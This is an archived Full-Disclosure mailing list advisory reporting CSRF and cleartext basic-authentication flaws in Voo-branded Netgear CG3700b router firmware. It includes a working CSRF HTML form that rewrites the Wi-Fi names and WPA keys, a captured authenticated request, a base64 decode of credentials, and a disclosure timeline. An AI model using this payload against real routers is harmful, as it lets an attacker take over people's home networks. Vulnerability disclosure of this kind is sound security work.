lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 26 Apr 2016 07:10:35 -0400
From: dev@...ler.net
To: fulldisclosure@...lists.org
Subject: [FD] Multiple Vulnerabilities in Voo branded Netgear CG3700b

CVEs pending, screenshots and further examples available soon on my site.


Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03)
allows a (context-dependent) attacker to perform a Cross-Site Request
Forgery (CSRF) attack on all configuration setting
(/goform/<settingspage>) page POST requests. By tricking a user into
following a specially crafted link, an attacker can modify all settings
including WEP/WPA/WPA2 keys, restore the router to factory settings, or
even upload an entire malicious configuration file.

Example:
<form method="POST" name="form0" action="http://192.168.0.1/goform/index"
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value=0>
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value=20>
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value=0>
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value=20>
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value=1>
<input type="hidden" name="only_mode" value=0>
<input type="hidden" name="selected_ch_an" value=1>
</form>


Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------
This same modem handles authentication via basic authentication over the
default (HTTP, non-ssl) connection. This allows an attacker to easily
decode the base64 encoded username and password, and authenticate to the
router. This only requires an attacker be on the same network as the
router, and sniff the clear-text traffic.

Example:
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

root@...i:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@...i:~# base64 --decode voo.txt
voo:PASSWORD



Disclosure Timeline
-----------------------------
22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, was notified that this will not be fixed
at this time
20 April - attempted to contact Mitre again to receive CVE
21 April - sent to Full Disclosure
23 April - additional information (tentatively) posted to
http://www.doyler.net
26 April - resending to Full Disclosure due to some errors


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists